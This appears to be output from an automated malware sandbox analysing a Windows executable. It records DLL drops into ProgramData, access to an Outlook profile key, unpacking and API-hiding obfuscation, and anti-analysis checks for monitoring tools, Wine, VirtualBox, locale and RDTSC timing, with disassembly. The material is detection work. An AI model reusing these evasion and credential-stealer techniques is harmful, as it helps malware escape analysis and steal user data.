Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1853440 > 1048576

Source: file.exe

Static PE information: Raw size of exbnbhbd is bigger than: 0x100000 < 0x19e400

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.1667089249.000000006CDCF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.1667089249.000000006CDCF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.760000.0.unpack :EW;.rsrc :W;.idata :W; :EW;exbnbhbd:EW;krctzlzf:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;exbnbhbd:EW;krctzlzf:EW;.taggant:EW;

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00779860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00779860

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: file.exe

Static PE information: real checksum: 0x1c4c58 should be: 0x1d3f0e

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: exbnbhbd
Source: file.exe	Static PE information: section name: krctzlzf
Source: file.exe	Static PE information: section name: .taggant
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C188E9 push edx; mov dword ptr [esp], ebp	0_2_00C1890F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C188E9 push esi; mov dword ptr [esp], eax	0_2_00C1891F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A9209D push edx; mov dword ptr [esp], 2993B214h	0_2_00A920D9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A9209D push 274B5F8Fh; mov dword ptr [esp], edx	0_2_00A920F6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A9209D push 2CE25BCAh; mov dword ptr [esp], edi	0_2_00A92204
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A9209D push 41D85D98h; mov dword ptr [esp], edi	0_2_00A92302
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A9209D push eax; mov dword ptr [esp], edx	0_2_00A9231F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AA6894 push ebp; mov dword ptr [esp], edx	0_2_00AA6940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AA6894 push edx; mov dword ptr [esp], eax	0_2_00AA6995
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0077B035 push ecx; ret	0_2_0077B048
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ACF0EF push eax; mov dword ptr [esp], 26BFC402h	0_2_00ACF15E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ACF0EF push ecx; mov dword ptr [esp], esi	0_2_00ACF187
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ACF0EF push edi; mov dword ptr [esp], F00C9201h	0_2_00ACF1CD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BA08CB push ebp; mov dword ptr [esp], edx	0_2_00BA0983
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BA08CB push ebp; mov dword ptr [esp], eax	0_2_00BA09E9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push 3DADE61Dh; mov dword ptr [esp], ecx	0_2_00B2D8CB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push 434890FBh; mov dword ptr [esp], edi	0_2_00B2D8EA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push ebp; mov dword ptr [esp], eax	0_2_00B2D8F3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push esi; mov dword ptr [esp], ebx	0_2_00B2D979
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push 169C3BECh; mov dword ptr [esp], esi	0_2_00B2D9B4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push esi; mov dword ptr [esp], edi	0_2_00B2DA00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push 57922002h; mov dword ptr [esp], ecx	0_2_00B2DA6F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push ebx; mov dword ptr [esp], 051C2B00h	0_2_00B2DADF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push ecx; mov dword ptr [esp], 6E6DEFF6h	0_2_00B2DAEA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push eax; mov dword ptr [esp], esp	0_2_00B2DB27
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push 701F7537h; mov dword ptr [esp], edi	0_2_00B2DC74
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push edi; mov dword ptr [esp], 3FDFFC24h	0_2_00B2DC78
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push edx; mov dword ptr [esp], ebp	0_2_00B2DCF7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push 2FCD5FD7h; mov dword ptr [esp], eax	0_2_00B2DD04
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push eax; mov dword ptr [esp], edi	0_2_00B2DDC1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push 5EADB701h; mov dword ptr [esp], edx	0_2_00B2DE30

Source: file.exe

Static PE information: section name: exbnbhbd entropy: 7.953344026869935

Drops PE files

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\file.exe

0_2_00779860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B33F0A second address: B33F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B33F15 second address: B33F19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B33F19 second address: B33F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3F960 second address: B3F99B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FB8FCCA77C1h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jl 00007FB8FCCA77CCh 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FB8FCCA77C4h 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push esi 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3FC44 second address: B3FC48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3FC48 second address: B3FC67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCCA77C5h 0x00000007 jbe 00007FB8FCCA77B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3FC67 second address: B3FC6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B400BA second address: B400BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B40208 second address: B40218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8FCD6487Bh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B43189 second address: B4318F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4327C second address: B43298 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCD64888h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B43298 second address: B432A2 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB8FCCA77BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B432A2 second address: B432C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB8FCD64885h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B432C0 second address: B432C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B432C6 second address: B432EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007FB8FCD6487Ch 0x00000011 mov eax, dword ptr [eax] 0x00000013 pushad 0x00000014 pushad 0x00000015 jnc 00007FB8FCD64876h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B432EA second address: B432F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B432F2 second address: B43304 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B43304 second address: B43360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [ebp+122D1B4Dh], edi 0x0000000d push 00000003h 0x0000000f mov dword ptr [ebp+122D1A58h], ebx 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007FB8FCCA77B8h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 mov esi, 0577DAD1h 0x00000036 push 00000003h 0x00000038 mov esi, 7620C8CEh 0x0000003d call 00007FB8FCCA77B9h 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FB8FCCA77BAh 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B43360 second address: B4336A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB8FCD6487Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4336A second address: B43381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c pop edx 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pushad 0x00000015 popad 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B43381 second address: B43398 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB8FCD6487Ch 0x00000008 jo 00007FB8FCD64876h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B43398 second address: B4339C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4339C second address: B433A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B433A0 second address: B43409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007FB8FCCA77BEh 0x00000012 jmp 00007FB8FCCA77BCh 0x00000017 popad 0x00000018 pop eax 0x00000019 pop eax 0x0000001a jmp 00007FB8FCCA77C0h 0x0000001f lea ebx, dword ptr [ebp+12454FBFh] 0x00000025 mov dword ptr [ebp+122D1AA6h], edi 0x0000002b xchg eax, ebx 0x0000002c push eax 0x0000002d jmp 00007FB8FCCA77C5h 0x00000032 pop eax 0x00000033 push eax 0x00000034 je 00007FB8FCCA77CEh 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B43409 second address: B4340D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B434C2 second address: B4353C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 jns 00007FB8FCCA77B6h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop ecx 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push edi 0x00000017 jmp 00007FB8FCCA77BBh 0x0000001c pop edi 0x0000001d mov eax, dword ptr [eax] 0x0000001f jnc 00007FB8FCCA77C8h 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 push edi 0x0000002a push edi 0x0000002b jne 00007FB8FCCA77B6h 0x00000031 pop edi 0x00000032 pop edi 0x00000033 pop eax 0x00000034 and esi, dword ptr [ebp+122D2984h] 0x0000003a push 00000003h 0x0000003c sub dword ptr [ebp+122D19B2h], ecx 0x00000042 mov edi, dword ptr [ebp+122D2954h] 0x00000048 push 00000000h 0x0000004a mov edi, dword ptr [ebp+122D28D8h] 0x00000050 mov dh, CFh 0x00000052 push 00000003h 0x00000054 or cx, 5AACh 0x00000059 push B90D3E36h 0x0000005e push esi 0x0000005f push ebx 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6185A second address: B61886 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB8FCD64876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB8FCD6487Ah 0x00000011 jmp 00007FB8FCD64886h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B61A90 second address: B61A94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B61A94 second address: B61AB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB8FCD64884h 0x0000000b popad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B61F99 second address: B61F9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B62114 second address: B6211A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6211A second address: B6212B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB8FCCA77B6h 0x0000000a popad 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6212B second address: B62145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 jmp 00007FB8FCD64883h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B62145 second address: B62151 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnc 00007FB8FCCA77B6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B622B1 second address: B622B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B622B5 second address: B622C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB8FCCA77B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B622C1 second address: B622D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8FCD6487Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B622D2 second address: B622D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B622D6 second address: B622F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8FCD6487Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c js 00007FB8FCD64876h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B56812 second address: B56818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B56818 second address: B5681C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6313B second address: B63141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6705D second address: B67061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B66126 second address: B6612C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6612C second address: B66130 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6B11C second address: B6B122 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B24D5B second address: B24D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B24D61 second address: B24D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6DE71 second address: B6DE82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8FCD6487Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6DE82 second address: B6DEAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCCA77C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jns 00007FB8FCCA77B6h 0x00000010 jg 00007FB8FCCA77B6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
